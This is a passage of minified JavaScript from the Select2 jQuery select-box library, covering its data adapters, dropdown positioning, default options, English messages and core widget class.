s=this;if(this.$element.prop("multiple")){if(o.selected=!1,r(o.element).is("option"))return o.element.selected=!1,void this.$element.trigger("change");this.current(function(e){for(var t=[],i=0;i<e.length;i++){var n=e[i].id;n!==o.id&&-1===r.inArray(n,t)&&t.push(n)}s.$element.val(t),s.$element.trigger("change")})}},i.prototype.bind=function(e,t){var i=this;(this.container=e).on("select",function(e){i.select(e.data)}),e.on("unselect",function(e){i.unselect(e.data)})},i.prototype.destroy=function(){this.$element.find("*").each(function(){r.removeData(this,"data")})},i.prototype.query=function(n,e){var o=[],s=this;this.$element.children().each(function(){var e=r(this);if(e.is("option")||e.is("optgroup")){var t=s.item(e),i=s.matches(n,t);null!==i&&o.push(i)}}),e({results:o})},i.prototype.addOptions=function(e){t.appendMany(this.$element,e)},i.prototype.option=function(e){var t;e.children?(t=document.createElement("optgroup")).label=e.text:void 0!==(t=document.createElement("option")).textContent?t.textContent=e.text:t.innerText=e.text,void 0!==e.id&&(t.value=e.id),e.disabled&&(t.disabled=!0),e.selected&&(t.selected=!0),e.title&&(t.title=e.title);var i=r(t),n=this._normalizeItem(e);return n.element=t,r.data(t,"data",n),i},i.prototype.item=function(e){var t={};if(null!=(t=r.data(e[0],"data")))return t;if(e.is("option"))t={id:e.val(),text:e.text(),disabled:e.prop("disabled"),selected:e.prop("selected"),title:e.prop("title")};else if(e.is("optgroup")){t={text:e.prop("label"),children:[],title:e.prop("title")};for(var i=e.children("option"),n=[],o=0;o<i.length;o++){var s=r(i[o]),a=this.item(s);n.push(a)}t.children=n}return(t=this._normalizeItem(t)).element=e[0],r.data(e[0],"data",t),t},i.prototype._normalizeItem=function(e){r.isPlainObject(e)||(e={id:e,text:e});return null!=(e=r.extend({},{text:""},e)).id&&(e.id=e.id.toString()),null!=e.text&&(e.text=e.text.toString()),null==e._resultId&&e.id&&null!=this.container&&(e._resultId=this.generateResultId(this.container,e)),r.extend({},{selected:!1,disabled:!1},e)},i.prototype.matches=function(e,t){return this.options.get("matcher")(e,t)},i}),e.define("select2/data/array",["./select","../utils","jquery"],function(e,f,m){function n(e,t){var i=t.get("data")||[];n.__super__.constructor.call(this,e,t),this.addOptions(this.convertToOptions(i))}return f.Extend(n,e),n.prototype.select=function(i){var e=this.$element.find("option").filter(function(e,t){return t.value==i.id.toString()});0===e.length&&(e=this.option(i),this.addOptions(e)),n.__super__.select.call(this,i)},n.prototype.convertToOptions=function(e){function t(e){return function(){return m(this).val()==e.id}}for(var i=this,n=this.$element.find("option"),o=n.map(function(){return i.item(m(this)).id}).get(),s=[],a=0;a<e.length;a++){var r=this._normalizeItem(e[a]);if(0<=m.inArray(r.id,o)){var l=n.filter(t(r)),c=this.item(l),u=m.extend(!0,{},r,c),d=this.option(u);l.replaceWith(d)}else{var h=this.option(r);if(r.children){var p=this.convertToOptions(r.children);f.appendMany(h,p)}s.push(h)}}return s},n}),e.define("select2/data/ajax",["./array","../utils","jquery"],function(e,t,s){function i(e,t){this.ajaxOptions=this._applyDefaults(t.get("ajax")),null!=this.ajaxOptions.processResults&&(this.processResults=this.ajaxOptions.processResults),i.__super__.constructor.call(this,e,t)}return t.Extend(i,e),i.prototype._applyDefaults=function(e){var t={data:function(e){return s.extend({},e,{q:e.term})},transport:function(e,t,i){var n=s.ajax(e);return n.then(t),n.fail(i),n}};return s.extend({},t,e,!0)},i.prototype.processResults=function(e){return e},i.prototype.query=function(i,n){function e(){var e=t.transport(t,function(e){var t=o.processResults(e,i);o.options.get("debug")&&window.console&&console.error&&(t&&t.results&&s.isArray(t.results)||console.error("Select2: The AJAX results did not return an array in the `results` key of the response.")),n(t)},function(){e.status&&"0"===e.status||o.trigger("results:message",{message:"errorLoading"})});o._request=e}var o=this;null!=this._request&&(s.isFunction(this._request.abort)&&this._request.abort(),this._request=null);var t=s.extend({type:"GET"},this.ajaxOptions);"function"==typeof t.url&&(t.url=t.url.call(this.$element,i)),"function"==typeof t.data&&(t.data=t.data.call(this.$element,i)),this.ajaxOptions.delay&&null!=i.term?(this._queryTimeout&&window.clearTimeout(this._queryTimeout),this._queryTimeout=window.setTimeout(e,this.ajaxOptions.delay)):e()},i}),e.define("select2/data/tags",["jquery"],function(u){function e(e,t,i){var n=i.get("tags"),o=i.get("createTag");void 0!==o&&(this.createTag=o);var s=i.get("insertTag");if(void 0!==s&&(this.insertTag=s),e.call(this,t,i),u.isArray(n))for(var a=0;a<n.length;a++){var r=n[a],l=this._normalizeItem(r),c=this.option(l);this.$element.append(c)}}return e.prototype.query=function(e,c,u){var d=this;this._removeOldTags(),null!=c.term&&null==c.page?e.call(this,c,function e(t,i){for(var n=t.results,o=0;o<n.length;o++){var s=n[o],a=null!=s.children&&!e({results:s.children},!0);if((s.text||"").toUpperCase()===(c.term||"").toUpperCase()||a)return!i&&(t.data=n,void u(t))}if(i)return!0;var r=d.createTag(c);if(null!=r){var l=d.option(r);l.attr("data-select2-tag",!0),d.addOptions([l]),d.insertTag(n,r)}t.results=n,u(t)}):e.call(this,c,u)},e.prototype.createTag=function(e,t){var i=u.trim(t.term);return""===i?null:{id:i,text:i}},e.prototype.insertTag=function(e,t,i){t.unshift(i)},e.prototype._removeOldTags=function(e){this._lastTag,this.$element.find("option[data-select2-tag]").each(function(){this.selected||u(this).remove()})},e}),e.define("select2/data/tokenizer",["jquery"],function(d){function e(e,t,i){var n=i.get("tokenizer");void 0!==n&&(this.tokenizer=n),e.call(this,t,i)}return e.prototype.bind=function(e,t,i){e.call(this,t,i),this.$search=t.dropdown.$search||t.selection.$search||i.find(".select2-search__field")},e.prototype.query=function(e,t,i){var o=this;t.term=t.term||"";var n=this.tokenizer(t,this.options,function(e){var t,i=o._normalizeItem(e);if(!o.$element.find("option").filter(function(){return d(this).val()===i.id}).length){var n=o.option(i);n.attr("data-select2-tag",!0),o._removeOldTags(),o.addOptions([n])}t=i,o.trigger("select",{data:t})});n.term!==t.term&&(this.$search.length&&(this.$search.val(n.term),this.$search.focus()),t.term=n.term),e.call(this,t,i)},e.prototype.tokenizer=function(e,t,i,n){for(var o=i.get("tokenSeparators")||[],s=t.term,a=0,r=this.createTag||function(e){return{id:e.term,text:e.term}};a<s.length;){var l=s[a];if(-1!==d.inArray(l,o)){var c=s.substr(0,a),u=r(d.extend({},t,{term:c}));null!=u?(n(u),s=s.substr(a+1)||"",a=0):a++}else a++}return{term:s}},e}),e.define("select2/data/minimumInputLength",[],function(){function e(e,t,i){this.minimumInputLength=i.get("minimumInputLength"),e.call(this,t,i)}return e.prototype.query=function(e,t,i){t.term=t.term||"",t.term.length<this.minimumInputLength?this.trigger("results:message",{message:"inputTooShort",args:{minimum:this.minimumInputLength,input:t.term,params:t}}):e.call(this,t,i)},e}),e.define("select2/data/maximumInputLength",[],function(){function e(e,t,i){this.maximumInputLength=i.get("maximumInputLength"),e.call(this,t,i)}return e.prototype.query=function(e,t,i){t.term=t.term||"",0<this.maximumInputLength&&t.term.length>this.maximumInputLength?this.trigger("results:message",{message:"inputTooLong",args:{maximum:this.maximumInputLength,input:t.term,params:t}}):e.call(this,t,i)},e}),e.define("select2/data/maximumSelectionLength",[],function(){function e(e,t,i){this.maximumSelectionLength=i.get("maximumSelectionLength"),e.call(this,t,i)}return e.prototype.query=function(i,n,o){var s=this;this.current(function(e){var t=null!=e?e.length:0;0<s.maximumSelectionLength&&t>=s.maximumSelectionLength?s.trigger("results:message",{message:"maximumSelected",args:{maximum:s.maximumSelectionLength}}):i.call(s,n,o)})},e}),e.define("select2/dropdown",["jquery","./utils"],function(t,e){function i(e,t){this.$element=e,this.options=t,i.__super__.constructor.call(this)}return e.Extend(i,e.Observable),i.prototype.render=function(){var e=t('<span class="select2-dropdown"><span class="select2-results"></span></span>');return e.attr("dir",this.options.get("dir")),this.$dropdown=e},i.prototype.bind=function(){},i.prototype.position=function(e,t){},i.prototype.destroy=function(){this.$dropdown.remove()},i}),e.define("select2/dropdown/search",["jquery","../utils"],function(o,e){function t(){}return t.prototype.render=function(e){var t=e.call(this),i=o('<span class="select2-search select2-search--dropdown"><input class="select2-search__field" type="search" tabindex="-1" autocomplete="off" autocorrect="off" autocapitalize="none" spellcheck="false" role="textbox" /></span>');return this.$searchContainer=i,this.$search=i.find("input"),t.prepend(i),t},t.prototype.bind=function(e,t,i){var n=this;e.call(this,t,i),this.$search.on("keydown",function(e){n.trigger("keypress",e),n._keyUpPrevented=e.isDefaultPrevented()}),this.$search.on("input",function(e){o(this).off("keyup")}),this.$search.on("keyup input",function(e){n.handleSearch(e)}),t.on("open",function(){n.$search.attr("tabindex",0),n.$search.focus(),window.setTimeout(function(){n.$search.focus()},0)}),t.on("close",function(){n.$search.attr("tabindex",-1),n.$search.val("")}),t.on("focus",function(){t.isOpen()||n.$search.focus()}),t.on("results:all",function(e){null!=e.query.term&&""!==e.query.term||(n.showSearch(e)?n.$searchContainer.removeClass("select2-search--hide"):n.$searchContainer.addClass("select2-search--hide"))})},t.prototype.handleSearch=function(e){if(!this._keyUpPrevented){var t=this.$search.val();this.trigger("query",{term:t})}this._keyUpPrevented=!1},t.prototype.showSearch=function(e,t){return!0},t}),e.define("select2/dropdown/hidePlaceholder",[],function(){function e(e,t,i,n){this.placeholder=this.normalizePlaceholder(i.get("placeholder")),e.call(this,t,i,n)}return e.prototype.append=function(e,t){t.results=this.removePlaceholder(t.results),e.call(this,t)},e.prototype.normalizePlaceholder=function(e,t){return"string"==typeof t&&(t={id:"",text:t}),t},e.prototype.removePlaceholder=function(e,t){for(var i=t.slice(0),n=t.length-1;0<=n;n--){var o=t[n];this.placeholder.id===o.id&&i.splice(n,1)}return i},e}),e.define("select2/dropdown/infiniteScroll",["jquery"],function(o){function e(e,t,i,n){this.lastParams={},e.call(this,t,i,n),this.$loadingMore=this.createLoadingMore(),this.loading=!1}return e.prototype.append=function(e,t){this.$loadingMore.remove(),this.loading=!1,e.call(this,t),this.showLoadingMore(t)&&this.$results.append(this.$loadingMore)},e.prototype.bind=function(e,t,i){var n=this;e.call(this,t,i),t.on("query",function(e){n.lastParams=e,n.loading=!0}),t.on("query:append",function(e){n.lastParams=e,n.loading=!0}),this.$results.on("scroll",function(){var e=o.contains(document.documentElement,n.$loadingMore[0]);!n.loading&&e&&n.$results.offset().top+n.$results.outerHeight(!1)+50>=n.$loadingMore.offset().top+n.$loadingMore.outerHeight(!1)&&n.loadMore()})},e.prototype.loadMore=function(){this.loading=!0;var e=o.extend({},{page:1},this.lastParams);e.page++,this.trigger("query:append",e)},e.prototype.showLoadingMore=function(e,t){return t.pagination&&t.pagination.more},e.prototype.createLoadingMore=function(){var e=o('<li class="select2-results__option select2-results__option--load-more"role="treeitem" aria-disabled="true"></li>'),t=this.options.get("translations").get("loadingMore");return e.html(t(this.lastParams)),e},e}),e.define("select2/dropdown/attachBody",["jquery","../utils"],function(f,r){function e(e,t,i){this.$dropdownParent=i.get("dropdownParent")||f(document.body),e.call(this,t,i)}return e.prototype.bind=function(e,t,i){var n=this,o=!1;e.call(this,t,i),t.on("open",function(){n._showDropdown(),n._attachPositioningHandler(t),o||(o=!0,t.on("results:all",function(){n._positionDropdown(),n._resizeDropdown()}),t.on("results:append",function(){n._positionDropdown(),n._resizeDropdown()}))}),t.on("close",function(){n._hideDropdown(),n._detachPositioningHandler(t)}),this.$dropdownContainer.on("mousedown",function(e){e.stopPropagation()})},e.prototype.destroy=function(e){e.call(this),this.$dropdownContainer.remove()},e.prototype.position=function(e,t,i){t.attr("class",i.attr("class")),t.removeClass("select2"),t.addClass("select2-container--open"),t.css({position:"absolute",top:-999999}),this.$container=i},e.prototype.render=function(e){var t=f("<span></span>"),i=e.call(this);return t.append(i),this.$dropdownContainer=t},e.prototype._hideDropdown=function(e){this.$dropdownContainer.detach()},e.prototype._attachPositioningHandler=function(e,t){var i=this,n="scroll.select2."+t.id,o="resize.select2."+t.id,s="orientationchange.select2."+t.id,a=this.$container.parents().filter(r.hasScroll);a.each(function(){f(this).data("select2-scroll-position",{x:f(this).scrollLeft(),y:f(this).scrollTop()})}),a.on(n,function(e){var t=f(this).data("select2-scroll-position");f(this).scrollTop(t.y)}),f(window).on(n+" "+o+" "+s,function(e){i._positionDropdown(),i._resizeDropdown()})},e.prototype._detachPositioningHandler=function(e,t){var i="scroll.select2."+t.id,n="resize.select2."+t.id,o="orientationchange.select2."+t.id;this.$container.parents().filter(r.hasScroll).off(i),f(window).off(i+" "+n+" "+o)},e.prototype._positionDropdown=function(){var e=f(window),t=this.$dropdown.hasClass("select2-dropdown--above"),i=this.$dropdown.hasClass("select2-dropdown--below"),n=null,o=this.$container.offset();o.bottom=o.top+this.$container.outerHeight(!1);var s={height:this.$container.outerHeight(!1)};s.top=o.top,s.bottom=o.top+s.height;var a=this.$dropdown.outerHeight(!1),r=e.scrollTop(),l=e.scrollTop()+e.height(),c=r<o.top-a,u=l>o.bottom+a,d={left:o.left,top:s.bottom},h=this.$dropdownParent;"static"===h.css("position")&&(h=h.offsetParent());var p=h.offset();d.top-=p.top,d.left-=p.left,t||i||(n="below"),u||!c||t?!c&&u&&t&&(n="below"):n="above",("above"==n||t&&"below"!==n)&&(d.top=s.top-p.top-a),null!=n&&(this.$dropdown.removeClass("select2-dropdown--below select2-dropdown--above").addClass("select2-dropdown--"+n),this.$container.removeClass("select2-container--below select2-container--above").addClass("select2-container--"+n)),this.$dropdownContainer.css(d)},e.prototype._resizeDropdown=function(){var e={width:this.$container.outerWidth(!1)+"px"};this.options.get("dropdownAutoWidth")&&(e.minWidth=e.width,e.position="relative",e.width="auto"),this.$dropdown.css(e)},e.prototype._showDropdown=function(e){this.$dropdownContainer.appendTo(this.$dropdownParent),this._positionDropdown(),this._resizeDropdown()},e}),e.define("select2/dropdown/minimumResultsForSearch",[],function(){function e(e,t,i,n){this.minimumResultsForSearch=i.get("minimumResultsForSearch"),this.minimumResultsForSearch<0&&(this.minimumResultsForSearch=1/0),e.call(this,t,i,n)}return e.prototype.showSearch=function(e,t){return!(function e(t){for(var i=0,n=0;n<t.length;n++){var o=t[n];o.children?i+=e(o.children):i++}return i}(t.data.results)<this.minimumResultsForSearch)&&e.call(this,t)},e}),e.define("select2/dropdown/selectOnClose",[],function(){function e(){}return e.prototype.bind=function(e,t,i){var n=this;e.call(this,t,i),t.on("close",function(e){n._handleSelectOnClose(e)})},e.prototype._handleSelectOnClose=function(e,t){if(t&&null!=t.originalSelect2Event){var i=t.originalSelect2Event;if("select"===i._type||"unselect"===i._type)return}var n=this.getHighlightedResults();if(!(n.length<1)){var o=n.data("data");null!=o.element&&o.element.selected||null==o.element&&o.selected||this.trigger("select",{data:o})}},e}),e.define("select2/dropdown/closeOnSelect",[],function(){function e(){}return e.prototype.bind=function(e,t,i){var n=this;e.call(this,t,i),t.on("select",function(e){n._selectTriggered(e)}),t.on("unselect",function(e){n._selectTriggered(e)})},e.prototype._selectTriggered=function(e,t){var i=t.originalEvent;i&&i.ctrlKey||this.trigger("close",{originalEvent:i,originalSelect2Event:t})},e}),e.define("select2/i18n/en",[],function(){return{errorLoading:function(){return"The results could not be loaded."},inputTooLong:function(e){var t=e.input.length-e.maximum,i="Please delete "+t+" character";return 1!=t&&(i+="s"),i},inputTooShort:function(e){return"Please enter "+(e.minimum-e.input.length)+" or more characters"},loadingMore:function(){return"Loading more results…"},maximumSelected:function(e){var t="You can only select "+e.maximum+" item";return 1!=e.maximum&&(t+="s"),t},noResults:function(){return"No results found"},searching:function(){return"Searching…"}}}),e.define("select2/defaults",["jquery","require","./results","./selection/single","./selection/multiple","./selection/placeholder","./selection/allowClear","./selection/search","./selection/eventRelay","./utils","./translation","./diacritics","./data/select","./data/array","./data/ajax","./data/tags","./data/tokenizer","./data/minimumInputLength","./data/maximumInputLength","./data/maximumSelectionLength","./dropdown","./dropdown/search","./dropdown/hidePlaceholder","./dropdown/infiniteScroll","./dropdown/attachBody","./dropdown/minimumResultsForSearch","./dropdown/selectOnClose","./dropdown/closeOnSelect","./i18n/en"],function(f,m,g,v,y,w,b,_,x,C,$,t,k,T,S,z,E,O,P,I,M,A,L,D,H,j,R,W,e){function i(){this.reset()}return i.prototype.apply=function(t){if(null==(t=f.extend(!0,{},this.defaults,t)).dataAdapter){if(null!=t.ajax?t.dataAdapter=S:null!=t.data?t.dataAdapter=T:t.dataAdapter=k,0<t.minimumInputLength&&(t.dataAdapter=C.Decorate(t.dataAdapter,O)),0<t.maximumInputLength&&(t.dataAdapter=C.Decorate(t.dataAdapter,P)),0<t.maximumSelectionLength&&(t.dataAdapter=C.Decorate(t.dataAdapter,I)),t.tags&&(t.dataAdapter=C.Decorate(t.dataAdapter,z)),null==t.tokenSeparators&&null==t.tokenizer||(t.dataAdapter=C.Decorate(t.dataAdapter,E)),null!=t.query){var e=m(t.amdBase+"compat/query");t.dataAdapter=C.Decorate(t.dataAdapter,e)}if(null!=t.initSelection){var i=m(t.amdBase+"compat/initSelection");t.dataAdapter=C.Decorate(t.dataAdapter,i)}}if(null==t.resultsAdapter&&(t.resultsAdapter=g,null!=t.ajax&&(t.resultsAdapter=C.Decorate(t.resultsAdapter,D)),null!=t.placeholder&&(t.resultsAdapter=C.Decorate(t.resultsAdapter,L)),t.selectOnClose&&(t.resultsAdapter=C.Decorate(t.resultsAdapter,R))),null==t.dropdownAdapter){if(t.multiple)t.dropdownAdapter=M;else{var n=C.Decorate(M,A);t.dropdownAdapter=n}if(0!==t.minimumResultsForSearch&&(t.dropdownAdapter=C.Decorate(t.dropdownAdapter,j)),t.closeOnSelect&&(t.dropdownAdapter=C.Decorate(t.dropdownAdapter,W)),null!=t.dropdownCssClass||null!=t.dropdownCss||null!=t.adaptDropdownCssClass){var o=m(t.amdBase+"compat/dropdownCss");t.dropdownAdapter=C.Decorate(t.dropdownAdapter,o)}t.dropdownAdapter=C.Decorate(t.dropdownAdapter,H)}if(null==t.selectionAdapter){if(t.multiple?t.selectionAdapter=y:t.selectionAdapter=v,null!=t.placeholder&&(t.selectionAdapter=C.Decorate(t.selectionAdapter,w)),t.allowClear&&(t.selectionAdapter=C.Decorate(t.selectionAdapter,b)),t.multiple&&(t.selectionAdapter=C.Decorate(t.selectionAdapter,_)),null!=t.containerCssClass||null!=t.containerCss||null!=t.adaptContainerCssClass){var s=m(t.amdBase+"compat/containerCss");t.selectionAdapter=C.Decorate(t.selectionAdapter,s)}t.selectionAdapter=C.Decorate(t.selectionAdapter,x)}if("string"==typeof t.language)if(0<t.language.indexOf("-")){var a=t.language.split("-")[0];t.language=[t.language,a]}else t.language=[t.language];if(f.isArray(t.language)){var r=new $;t.language.push("en");for(var l=t.language,c=0;c<l.length;c++){var u=l[c],d={};try{d=$.loadPath(u)}catch(e){try{u=this.defaults.amdLanguageBase+u,d=$.loadPath(u)}catch(e){t.debug&&window.console&&console.warn&&console.warn('Select2: The language file for "'+u+'" could not be automatically loaded. A fallback will be used instead.');continue}}r.extend(d)}t.translations=r}else{var h=$.loadPath(this.defaults.amdLanguageBase+"en"),p=new $(t.language);p.extend(h),t.translations=p}return t},i.prototype.reset=function(){function r(e){return e.replace(/[^\u0000-\u007E]/g,function(e){return t[e]||e})}this.defaults={amdBase:"./",amdLanguageBase:"./i18n/",closeOnSelect:!0,debug:!1,dropdownAutoWidth:!1,escapeMarkup:C.escapeMarkup,language:e,matcher:function e(t,i){if(""===f.trim(t.term))return i;if(i.children&&0<i.children.length){for(var n=f.extend(!0,{},i),o=i.children.length-1;0<=o;o--)null==e(t,i.children[o])&&n.children.splice(o,1);return 0<n.children.length?n:e(t,n)}var s=r(i.text).toUpperCase(),a=r(t.term).toUpperCase();return-1<s.indexOf(a)?i:null},minimumInputLength:0,maximumInputLength:0,maximumSelectionLength:0,minimumResultsForSearch:0,selectOnClose:!1,sorter:function(e){return e},templateResult:function(e){return e.text},templateSelection:function(e){return e.text},theme:"default",width:"resolve"}},i.prototype.set=function(e,t){var i={};i[f.camelCase(e)]=t;var n=C._convertData(i);f.extend(this.defaults,n)},new i}),e.define("select2/options",["require","jquery","./defaults","./utils"],function(n,s,o,a){function e(e,t){if(this.options=e,null!=t&&this.fromElement(t),this.options=o.apply(this.options),t&&t.is("input")){var i=n(this.get("amdBase")+"compat/inputData");this.options.dataAdapter=a.Decorate(this.options.dataAdapter,i)}}return e.prototype.fromElement=function(e){var t=["select2"];null==this.options.multiple&&(this.options.multiple=e.prop("multiple")),null==this.options.disabled&&(this.options.disabled=e.prop("disabled")),null==this.options.language&&(e.prop("lang")?this.options.language=e.prop("lang").toLowerCase():e.closest("[lang]").prop("lang")&&(this.options.language=e.closest("[lang]").prop("lang"))),null==this.options.dir&&(e.prop("dir")?this.options.dir=e.prop("dir"):e.closest("[dir]").prop("dir")?this.options.dir=e.closest("[dir]").prop("dir"):this.options.dir="ltr"),e.prop("disabled",this.options.disabled),e.prop("multiple",this.options.multiple),e.data("select2Tags")&&(this.options.debug&&window.console&&console.warn&&console.warn('Select2: The `data-select2-tags` attribute has been changed to use the `data-data` and `data-tags="true"` attributes and will be removed in future versions of Select2.'),e.data("data",e.data("select2Tags")),e.data("tags",!0)),e.data("ajaxUrl")&&(this.options.debug&&window.console&&console.warn&&console.warn("Select2: The `data-ajax-url` attribute has been changed to `data-ajax--url` and support for the old attribute will be removed in future versions of Select2."),e.attr("ajax--url",e.data("ajaxUrl")),e.data("ajax--url",e.data("ajaxUrl")));var i;i=s.fn.jquery&&"1."==s.fn.jquery.substr(0,2)&&e[0].dataset?s.extend(!0,{},e[0].dataset,e.data()):e.data();var n=s.extend(!0,{},i);for(var o in n=a._convertData(n))-1<s.inArray(o,t)||(s.isPlainObject(this.options[o])?s.extend(this.options[o],n[o]):this.options[o]=n[o]);return this},e.prototype.get=function(e){return this.options[e]},e.prototype.set=function(e,t){this.options[e]=t},e}),e.define("select2/core",["jquery","./options","./utils","./keys"],function(o,c,i,n){var u=function(e,t){null!=e.data("select2")&&e.data("select2").destroy(),this.$element=e,this.id=this._generateId(e),t=t||{},this.options=new c(t,e),u.__super__.constructor.call(this);var i=e.attr("tabindex")||0;e.data("old-tabindex",i),e.attr("tabindex","-1");var n=this.options.get("dataAdapter");this.dataAdapter=new n(e,this.options);var o=this.render();this._placeContainer(o);var s=this.options.get("selectionAdapter");this.selection=new s(e,this.options),this.$selection=this.selection.render(),this.selection.position(this.$selection,o);var a=this.options.get("dropdownAdapter");this.dropdown=new a(e,this.options),this.$dropdown=this.dropdown.render(),this.dropdown.position(this.$dropdown,o);var r=this.options.get("resultsAdapter");this.results=new r(e,this.options,this.dataAdapter),this.$results=this.results.render(),this.results.position(this.$results,this.$dropdown);var l=this;this._bindAdapters(),this._registerDomEvents(),this._registerDataEvents(),this._registerSelectionEvents(),this._registerDropdownEvents(),this._registerResultsEvents(),this._registerEvents(),this.dataAdapter.current(function(e){l.trigger("selection:update",{data:e})}),e.addClass("select2-hidden-accessible"),e.attr("aria-hidden","true"),this._syncAttributes(),e.data("select2",this)};return i.Extend(u,i.Observable),u.prototype._generateId=function(e){return"select2-"+(null!=e.attr("id")?e.attr("id"):null!=e.attr("name")?e.attr("name")+"-"+i.generateChars(2):i.generateChars(4)).replace(/(:|\.|\[|\]|,)/g,"")},u.prototype._placeContainer=function(e){e.insertAfter(this.$element);var t=this._resolveWidth(this.$element,this.options.get("width"));null!=t&&e.css("width",t)},u.prototype._resolveWidth=function(e,t){var i=/^width:(([-+]?([0-9]*\.)?[0-9]+)(px|em|ex|%|in|cm|mm|pt|pc))/i;if("resolve"==t){var n=this._resolveWidth(e,"style");return null!=n?n:this._resolveWidth(e,"element")}if("element"==t){var o=e.outerWidth(!1);return o<=0?"auto":o+"px"}if("style"==t){var s=e.attr("style");if("string"!=typeof s)return null;for(var a=s.split(";"),r=0,l=a.length;r<l;r+=1){var c=a[r].replace(/\s/g,"").match(i);if(null!==c&&1<=c.length)return c[1]}return null}return t},u.prototype._bindAdapters=function(){this.dataAdapter.bind(this,this.$container),this.selection.bind(this,this.$container),this.dropdown.bind(this,this.$container),this.results.bind(this,this.$container)},u.prototype._registerDomEvents=function(){var t=this;this.$element.on("change.select2",function(){t.dataAdapter.current(function(e){t.trigger("selection:update",{data:e})})}),this.$element.on("focus.select2",function(e){t.trigger("focus",e)}),this._syncA=i.bind(this._syncAttributes,this),this._syncS=i.bind(this._syncSubtree,this),this.$element[0].attachEvent&&this.$element[0].attachEvent("onpropertychange",this._syncA);var e=window.MutationObserver||window.WebKitMutationObserver||window.MozMutationObserver;null!=e?(this._observer=new e(function(e){o.each(e,t._syncA),o.each(e,t._syncS)}),this._observer.observe(this.$element[0],{attributes:!0,childList:!0,subtree:!1})):this.$element[0].addEventListener&&(this.$element[0].addEventListener("DOMAttrModified",t._syncA,!1),this.$element[0].addEventListener("DOMNodeInserted",t._syncS,!1),this.$element[0].addEventListener("DOMNodeRemoved",t._syncS,!1))},u.prototype._registerDataEvents=function(){var i=this;this.dataAdapter.on("*",function(e,t){i.trigger(e,t)})},u.prototype._registerSelectionEvents=function(){var i=this,n=["toggle","focus"];this.selection.on("toggle",function(){i.toggleDropdown()}),this.selection.on("focus",function(e){i.focus(e)}),this.selection.on("*",function(e,t){-1===o.inArray(e,n)&&i.trigger(e,t)})},u.prototype._registerDropdownEvents=function(){var i=this;this.dropdown.on("*",function(e,t){i.trigger(e,t)})},u.prototype._registerResultsEvents=function(){var i=this;this.results.on("*",function(e,t){i.trigger(e,t)})},u.prototype._registerEvents=function(){var i=this;this.on("open",function(){i.$container.addClass("select2-container--open")}),this.on("close",function(){i.$container.removeClass("select2-container--open")}),this.on("enable",function(){i.$container.removeClass("select2-container--disabled")}),this.on("disable",function(){i.$container.addClass("select2-container--disabled")}),this.on("blur",function(){i.$container.removeClass("select2-container--focus")}),this.on("query",function(t){i.isOpen()||i.trigger("open",{}),this.dataAdapter.query(t,function(e){i.trigger("results:all",{data:e,query:t})})}),this.on("query:append",function(t){this.dataAdapter.query(t,function(e){i.trigger("results:append",{data:e,query:t})})}),this.on("keypress",function(e){var t=e.which;i.isOpen()?t===n.ESC||t===n.TAB||t===n.UP&&e.altKey?(i.close(),e.preventDefault()):t===n.ENTER?(i.trigger("results:select",{}),e.preventDefault()):t===n.SPACE&&e.ctrlKey?(i.trigger("results:toggle",{}),e.preventDefault()):t===n.UP?(i.trigger("results:previous",{}),e.preventDefault()):t===n.DOWN&&(i.trigger("results:next",{}),e.preventDefault()):(t===n.ENTER||t===n.SPACE||t===n.DOWN&&e.altKey)&&(i.open(),e.preventDefault())})},u.prototype._syncAttributes=function(){this.options.set("disabled",this.$element.prop("disabled")),this.options.get("disabled")?(this.isOpen()&&this.close(),this.trigger("disable",{})):this.trigger("enable",{})},u.prototype._syncSubtree=function(e,t){var i=!1,n=this;if(!e||!e.target||"OPTION"===e.target.nodeName||"OPTGROUP"===e.target.nodeName){if(t)if(t.addedNodes&&0<t.addedNodes.length)for(var o=0;o<t.addedNodes.length;o++){t.addedNodes[o].selected&&(i=!0)}else t.removedNodes&&0<t.removedNodes.length&&(i=!0);else i=!0;i&&this.dataAdapter.current(function(e){n.trigger("selection:update",{data:e})})}},u.prototype.trigger=function(e,t){var i=u.__super__.trigger,n={open:"opening",close:"closing",select:"selecting",unselect:"unselecting"};if(void 0===t&&(t={}),e in n){var o=n[e],s={prevented:!1,name:e,args:t};if(i.call(this,o,s),s.prevented)return void(t.prevented=!0)}i.call(this,e,t)},u.prototype.toggleDropdown=function(){this.options.get("disabled")||(this.isOpen()?this.close():this.open())},u.prototype.open=function(){this.isOpen()||this.trigger("query",{})},u.prototype.close=function(){this.isOpen()&&this.trigger("close",{})},u.prototype.isOpen=function(){return this.$container.hasClass("select2-container--open")},u.prototype.hasFocus=function(){return this.$container.hasClass("select2-container--focus")},u.prototype.focus=function(e){this.hasFocus()||(this.$container.addClass("select2-container--focus"),this.trigger("focus",{}))},u.prototype.enable=function(e){this.options.get("debug")&&window.console&&console.warn&&console.warn('Select2: The `select2("enable")` method has been deprecated and will be removed in later Select2 versions. Use $element.prop("disabled") instead.'),null!=e&&0!==e.length||(e=[!0]);var t=!e[0];this.$element.prop("disabled",t)},u.prototype.data=function(){this.options.get("debug")&&0<arguments.length&&window.console&&console.warn&&console.warn('Select2: Data can no longer be set using `select2("data")`. You should consider setting the value instead using `$element.val()`.');var t=[];return this.dataAdapter.current(function(e){t=e}),t},u.prototype.val=function(e){if(this.options.get("debug")&&window.console&&console.warn&&console.warn('Select2: The `select2("val")` method has been deprecated and will be removed in later Select2 versions. Use $element.val() instead.'),null==e||0===e.length)return this.$element.val();var t=e[0];o.isArray(t)&&(t=o.map(t,function(e){return e.toString()})),this.$element.val(t).trigger("change")},u.prototype.destroy=function(){this.$container.remove(),this.$element[0].detachEvent&&this.$element[0].detachEvent("onpropertychange",this._syncA),null!=this._observer?(this._observer.disconnect(),this._observer=null):this.$element[0].removeEventListener&&(this.$element[0].removeEventListener("DOMAttrModified",this._syncA,!1),this.$element[0].removeEventListener("DOMNodeInserted",this._syncS,!1),this.$element[0].removeEventListener("DOMNodeRemoved",this._syncS,!1)),this._syncA=null,this._syncS=null,this.$element.off(".select2"),this.$element.attr("tabindex",this.$element.data("old-tabindex")),this.$element.removeClass("select2-hidden-accessible"),this.$element.attr("aria-hidden","false"),this.$element.removeData("select2"),this.dataAdapter.destroy(),this.selection.destroy(),this.dropdown.destroy(),this.results.destroy(),this.dataAdapter=null,this.selection=null,this.dropdown=null,this.results=null},u.prototype.render=function(){var e=o('<span class="select2 select2-container"><span class="selection"></span><span class="dropdown-wrapper" aria-hidden="true"></span></span>');return e.attr("dir",this.options.get("dir")),this.$container=e,this.$container.addClass("select2-container--"+this.options.get("theme")),e.data("element",this.$element),e},u}),e.define("jquery-mousewheel",["jquery"],function(e){return 